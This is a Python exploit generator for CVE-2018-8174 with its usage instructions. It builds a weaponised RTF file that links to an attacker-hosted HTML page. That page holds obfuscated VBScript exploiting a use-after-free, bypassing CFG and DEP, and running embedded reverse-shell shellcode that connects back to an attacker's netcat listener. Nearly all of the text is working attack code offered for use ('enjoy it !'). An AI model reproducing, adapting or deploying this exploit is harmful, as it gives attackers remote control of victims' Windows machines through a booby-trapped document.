usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]
Exploit for CVE-2018-8174
optional arguments: -h, --help show this help message and exit -u URL, --url URL exp url -o OUTPUT, --output OUTPUT Output exploit rtf -i IP, --ip IP ip for netcat -p PORT, --port PORT port for netcat
eg:
- python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
- put exploit.html on your server (1.1.1.1)
- netcat listen on [any] 4444 (2.2.2.2)
enjoy it !
POC:
1 import argparse 2 import struct 3 4 SampleRTF = R"""{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} 5 {\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang9\f0\fs22{\object\objautlink\objupdate\rsltpict\objw4321\objh4321{\*\objclass htmlfile}{\*\objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000 6 d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 10 fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b 15 beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000 16 000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000 17 0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000 18 000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 19 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 20 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 21 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 22 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000 23 UNICODE_URL 24 000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000 25 000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700 26 NORMAL_URL 27 0000bbbbcccc2700 28 UNICODE_URL 29 0000000000000000000000000000000000000000000000000000 30 0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000 31 0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000} 32 }\par 33 } 34 """ 35 36 SampleHTML = R""" 37 <!doctype html> 38 <html lang="en"> 39 <head> 40 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 41 <meta http-equiv="x-ua-compatible" content="IE=10"> 42 <meta http-equiv="Expires" content="0"> 43 <meta http-equiv="Pragma" content="no-cache"> 44 <meta http-equiv="Cache-control" content="no-cache"> 45 <meta http-equiv="Cache" content="no-cache"> 46 </head> 47 <body> 48 <script language="vbscript"> 49 Dim lIIl 50 Dim IIIlI(6),IllII(6) 51 Dim IllI 52 Dim IIllI(40) 53 Dim lIlIIl,lIIIll 54 Dim IlII 55 Dim llll,IIIIl 56 Dim llllIl,IlIIII 57 Dim NtContinueAddr,VirtualProtectAddr 58 IlII=195948557 59 lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000") 60 lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000") 61 IllI=195890093 62 Function IIIII(Domain) 63 lIlII=0 64 IllllI=0 65 IIlIIl=0 66 Id=CLng(Rnd*1000000) 67 lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99) 68 If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then 69 lIlII=lIlII-(&h86d+6447-&H219b) 70 End If 71 IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255) 72 IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e) 73 IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII 74 End Function 75 Function lIIII(ByVal lIlIl) 76 IIll="" 77 For index=0 To Len(lIlIl)-1 78 IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2) 79 Next 80 IIll=IIll &"00" 81 If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then 82 IIll=IIll &"00" 83 End If 84 For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4) 85 lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3)) 86 lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504)) 87 lIIII=lIIII &"%u" &lIlIll &lIIIlI 88 Next 89 End Function 90 Function lIlI(ByVal Number,ByVal Length) 91 IIII=Hex(Number) 92 If Len(IIII)<Length Then 93 IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros 94 Else 95 IIII=Right(IIII,Length) 96 End If 97 lIlI=IIII 98 End Function 99 Function GetUint32(lIII) 100 Dim value 101 llll.mem(IlII+8)=lIII+4 102 llll.mem(IlII)=8 'type string 103 value=llll.P0123456789 104 llll.mem(IlII)=2 105 GetUint32=value 106 End Function 107 Function IllIIl(lIII) 108 IllIIl=GetUint32(lIII) And (131071-65536) 109 End Function 110 Function lllII(lIII) 111 lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c) 112 End Function 113 Sub llllll 114 End Sub 115 Function GetMemValue 116 llll.mem(IlII)=(&h713+3616-&H1530) 117 GetMemValue=llll.mem(IlII+(&h169c+712-&H195c)) 118 End Function 119 Sub SetMemValue(ByRef IlIIIl) 120 llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl 121 End Sub 122 Function LeakVBAddr 123 On Error Resume Next 124 Dim lllll 125 lllll=llllll 126 lllll=null 127 SetMemValue lllll 128 LeakVBAddr=GetMemValue() 129 End Function 130 Function GetBaseByDOSmodeSearch(IllIll) 131 Dim llIl 132 llIl=IllIll And &hffff0000 133 Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692 134 llIl=llIl-65536 135 Loop 136 GetBaseByDOSmodeSearch=llIl 137 End Function 138 Function StrCompWrapper(lIII,llIlIl) 139 Dim lIIlI,IIIl 140 lIIlI="" 141 For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835) 142 lIIlI=lIIlI &Chr(lllII(lIII+IIIl)) 143 Next 144 StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl)) 145 End Function 146 Function GetBaseFromImport(base_address,name_input) 147 Dim import_rva,nt_header,descriptor,import_dir 148 Dim IIIIII 149 nt_header=GetUint32(base_address+(&h3c)) 150 import_rva=GetUint32(base_address+nt_header+&h80) 151 import_dir=base_address+import_rva 152 descriptor=0 153 Do While True 154 Dim Name 155 Name=GetUint32(import_dir+descriptor*(&h14)+&hc) 156 If Name=0 Then 157 GetBaseFromImport=&hBAAD0000 158 Exit Function 159 Else 160 If StrCompWrapper(base_address+Name,name_input)=0 Then 161 Exit Do 162 End If 163 End If 164 descriptor=descriptor+1 165 Loop 166 IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10) 167 GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII)) 168 End Function 169 Function GetProcAddr(dll_base,name) 170 Dim p,export_dir,index 171 Dim function_rvas,function_names,function_ordin 172 Dim Illlll 173 p=GetUint32(dll_base+&h3c) 174 p=GetUint32(dll_base+p+&h78) 175 export_dir=dll_base+p 176 function_rvas=dll_base+GetUint32(export_dir+&h1c) 177 function_names=dll_base+GetUint32(export_dir+&h20) 178 function_ordin=dll_base+GetUint32(export_dir+&h24) 179 index=0 180 Do While True 181 Dim lllI 182 lllI=GetUint32(function_names+index*4) 183 If StrCompWrapper(dll_base+lllI,name)=0 Then 184 Exit Do 185 End If 186 index=index+1 187 Loop 188 Illlll=IllIIl(function_ordin+index*2) 189 p=GetUint32(function_rvas+Illlll*4) 190 GetProcAddr=dll_base+p 191 End Function 192 Function GetShellcode() 193 IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII(""))) 194 IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) 195 GetShellcode=IIlI 196 End Function 197 Function EscapeAddress(ByVal value) 198 Dim High,Low 199 High=lIlI((value And &hffff0000)/&h10000,4) 200 Low=lIlI(value And &hffff,4) 201 EscapeAddress=Unescape("%u" &Low &"%u" &High) 202 End Function 203 Function lIllIl 204 Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI 205 IlllI=lIlI(NtContinueAddr,8) 206 IlIII=Mid(IlllI,1,2) 207 llllI=Mid(IlllI,3,2) 208 llIII=Mid(IlllI,5,2) 209 lIllI=Mid(IlllI,7,2) 210 IIlI="" 211 IIlI=IIlI &"%u0000%u" &lIllI &"00" 212 For IIIl=1 To 3 213 IIlI=IIlI &"%u" &llllI &llIII 214 IIlI=IIlI &"%u" &lIllI &IlIII 215 Next 216 IIlI=IIlI &"%u" &llllI &llIII 217 IIlI=IIlI &"%u00" &IlIII 218 lIllIl=Unescape(IIlI) 219 End Function 220 Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg 221 Dim IIlI 222 IIlI=String((100334-65536),Unescape("%u4141")) 223 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam) 224 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam) 225 IIlI=IIlI &EscapeAddress(&h3000) 226 IIlI=IIlI &EscapeAddress(&h40) 227 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8) 228 IIlI=IIlI &String(6,Unescape("%u4242")) 229 IIlI=IIlI &lIllIl() 230 IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) 231 WrapShellcodeWithNtContinueContext=IIlI 232 End Function 233 Function ExpandWithVirtualProtect(lIlll) 234 Dim IIlI 235 Dim lllllI 236 lllllI=lIlll+&h23 237 IIlI="" 238 IIlI=IIlI &EscapeAddress(lllllI) 239 IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141")) 240 IIlI=IIlI &EscapeAddress(VirtualProtectAddr) 241 IIlI=IIlI &EscapeAddress(&h1b) 242 IIlI=IIlI &EscapeAddress(0) 243 IIlI=IIlI &EscapeAddress(lIlll) 244 IIlI=IIlI &EscapeAddress(&h23) 245 IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343")) 246 ExpandWithVirtualProtect=IIlI 247 End Function 248 Sub ExecuteShellcode 249 llll.mem(IlII)=&h4d 'DEP bypass 250 llll.mem(IlII+8)=0 251 msgbox(IlII) 'VT replaced 252 End Sub 253 Class cla1 254 Private Sub Class_Terminate() 255 Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8)) 256 IllI=IllI+(&h14b5+2725-&H1f59) 257 lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d) 258 End Sub 259 End Class 260 Class cla2 261 Private Sub Class_Terminate() 262 Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a)) 263 IllI=IllI+(&h880+542-&Ha9d) 264 lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857) 265 End Sub 266 End Class 267 Class IIIlIl 268 End Class 269 Class llIIl 270 Dim mem 271 Function P 272 End Function 273 Function SetProp(Value) 274 mem=Value 275 SetProp=0 276 End Function 277 End Class 278 Class IIIlll 279 Dim mem 280 Function P0123456789 281 P0123456789=LenB(mem(IlII+8)) 282 End Function 283 Function SPP 284 End Function 285 End Class 286 Class lllIIl 287 Public Default Property Get P 288 Dim llII 289 P=174088534690791e-324 290 For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c) 291 IIIlI(IIIl)=(&h2176+711-&H243d) 292 Next 293 Set llII=New IIIlll 294 llII.mem=lIlIIl 295 For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c) 296 Set IIIlI(IIIl)=llII 297 Next 298 End Property 299 End Class 300 Class llllII 301 Public Default Property Get P 302 Dim llII 303 P=636598737289582e-328 304 For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84) 305 IllII(IIIl)=(&h442+2598-&He68) 306 Next 307 Set llII=New IIIlll 308 llII.mem=lIIIll 309 For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b) 310 Set IllII(IIIl)=llII 311 Next 312 End Property 313 End Class 314 Set llllIl=New lllIIl 315 Set IlIIII=New llllII 316 Sub UAF 317 For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233) 318 Set IIllI(IIIl)=New IIIlIl 319 Next 320 For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed) 321 Set IIllI(IIIl)=New llIIl 322 Next 323 IllI=0 324 For IIIl=0 To 6 325 ReDim lIIl(1) 326 Set lIIl(1)=New cla1 327 Erase lIIl 328 Next 329 Set llll=New llIIl 330 IllI=0 331 For IIIl=0 To 6 332 ReDim lIIl(1) 333 Set lIIl(1)=New cla2 334 Erase lIIl 335 Next 336 Set IIIIl=New llIIl 337 End Sub 338 Sub InitObjects 339 llll.SetProp(llllIl) 340 IIIIl.SetProp(IlIIII) 341 IlII=IIIIl.mem 342 End Sub 343 Sub StartExploit 344 UAF 345 InitObjects 346 vb_adrr=LeakVBAddr() 347 // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr)) 348 vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) 349 // Alert "VBScript Base: 0x" & Hex(vbs_base) 350 msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") 351 // Alert "MSVCRT Base: 0x" & Hex(msv_base) 352 krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") 353 // Alert "KernelBase Base: 0x" & Hex(krb_base) 354 ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") 355 // Alert "Ntdll Base: 0x" & Hex(ntd_base) 356 VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") 357 // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) 358 NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") 359 // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr) 360 SetMemValue GetShellcode() 361 ShellcodeAddr=GetMemValue()+8 362 // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr) 363 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) 364 lIlll=GetMemValue()+69596 365 SetMemValue ExpandWithVirtualProtect(lIlll) 366 llIIll=GetMemValue() 367 // Alert "Executing Shellcode" 368 ExecuteShellcode 369 End Sub 370 StartExploit 371 </script> 372 </body> 373 </html> 374 """ 375 376 reverseip = '1.1.1.1' 377 reverseport = 4444 378 379 def create_rtf_file(url,filename): 380 NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex'))) 381 UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url) 382 if len(UNICODE_URL) < 154: 383 print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL) 384 UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL)) 385 res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL) 386 f = open(filename, 'w') 387 f.write(res) 388 f.close() 389 print "Generated "+filename+" successfully" 390 391 392 def rev_shellcode(ip,port): 393 ip = [int(i) for i in ip.split(".")] 394 buf = "" 395 buf += "\xfc\xe9\x8a\x00\x00\x00\x5d\x83\xc5\x0b\x81\xc4\x70" 396 buf += "\xfe\xff\xff\x8d\x54\x24\x60\x52\x68\xb1\x4a\x6b\xb1" 397 buf += "\xff\xd5\x8d\x44\x24\x60\xeb\x5c\x5e\x8d\x78\x60\x57" 398 buf += "\x50\x31\xdb\x53\x53\x68\x04\x00\x00\x08\x53\x53\x53" 399 buf += "\x56\x53\x68\x79\xcc\x3f\x86\xff\xd5\x85\xc0\x74\x59" 400 buf += "\x6a\x40\x80\xc7\x10\x53\x53\x31\xdb\x53\xff\x37\x68" 401 buf += "\xae\x87\x92\x3f\xff\xd5\x54\x68\x44\x01\x00\x00\xeb" 402 buf += "\x39\x50\xff\x37\x68\xc5\xd8\xbd\xe7\xff\xd5\x53\x53" 403 buf += "\x53\x8b\x4c\x24\xfc\x51\x53\x53\xff\x37\x68\xc6\xac" 404 buf += "\x9a\x79\xff\xd5\xe9\x41\x01\x00\x00\xe8\x9f\xff\xff" 405 buf += "\xff\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78\x65" 406 buf += "\x00\xe8\x71\xff\xff\xff\xe8\xc2\xff\xff\xff\xfc\xe8" 407 buf += "\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 408 buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" 409 buf += "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01" 410 buf += "\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c" 411 buf += "\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b" 412 buf += "\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac" 413 buf += "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b" 414 buf += "\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c" 415 buf += "\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" 416 buf += "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a" 417 buf += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73" 418 buf += "\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" 419 buf += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5" 420 buf += "\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0" 421 buf += "\xff\xd5\x97\x6a\x05\x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"\x68\x02\x00" 422 buf += struct.pack("!H",port)+"\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" 423 buf += "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0" 424 buf += "\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" 425 buf += "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44" 426 buf += "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" 427 buf += "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc" 428 buf += "\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08" 429 buf += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" 430 buf += "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" 431 buf += "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" 432 433 return buf.encode("hex") 434 435 def gen_shellcode(s): 436 n = len(s) 437 i = 0 438 strs = '' 439 if n % 4 == 2: 440 s=s+'41' 441 while i <n: 442 strs += '%u'+s[i+2:i+4]+s[i:i+2] 443 i+=4 444 return strs 445 446 if __name__ == '__main__': 447 parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174") 448 parser.add_argument("-u", "--url", help="exp url", required=True) 449 parser.add_argument('-o', "--output", help="Output exploit rtf", required=True) 450 parser.add_argument('-i', "--ip", help="ip for netcat", required=False) 451 parser.add_argument('-p', "--port", help="port for netcat", required=False) 452 args = parser.parse_args() 453 url = args.url 454 filename = args.output 455 create_rtf_file(url,filename) 456 if args.ip and args.port: 457 ip = str(args.ip) 458 port = int(args.port) 459 shellcode = gen_shellcode(rev_shellcode(ip,port)) 460 else: 461 shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport)) 462 res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode) 463 f = open('exploit.html', 'w') 464 f.write(res) 465 f.close() 466 467 print "!!! Completed !!!"